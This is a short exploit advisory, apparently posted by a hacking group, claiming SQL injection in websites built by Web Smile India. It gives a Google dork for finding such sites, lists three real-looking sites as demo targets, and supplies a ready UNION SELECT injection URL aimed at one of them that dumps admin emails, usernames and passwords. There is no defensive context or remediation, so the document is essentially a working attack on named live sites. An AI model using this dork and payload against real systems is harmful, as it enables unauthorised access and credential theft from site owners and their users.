--------------------------------------------------------- # Exploit Title: Maintained By Web Smile India - SQL Injection Vulnerability # Date: 2019-11-14 # Exploit Author: FreeBuzz Team # Vendor Homepage: http://www.websmileindia.com/ # Team Mail : Frb@tutamail.com # Tested on: Ubuntu --------------------------------------------------------- Google Dork: intext:"Maintained By Web Smile India " inurl:.php?id= - Demo: https://www.foodpharma.in https://www.novatek-electro.net http://sumitsurgical.in/ Injection: https://www.foodpharma.in/product.php?cid=-143+Union%20Select+1,2,3,Group_Concat(email,0x3a,username,0x3a,password),5,6,7,8,9,10+From+admin--+ ---------------------------------------------------------- # Discovered by Unkn0wn[0x9a@protonmail.com] # https://github.com/0x9a # We Are : AloneGhost - VeNoM - Agent Haze - Old_One - Unkn0wn FreeBuzz Team @ 2012-2019 [FRB]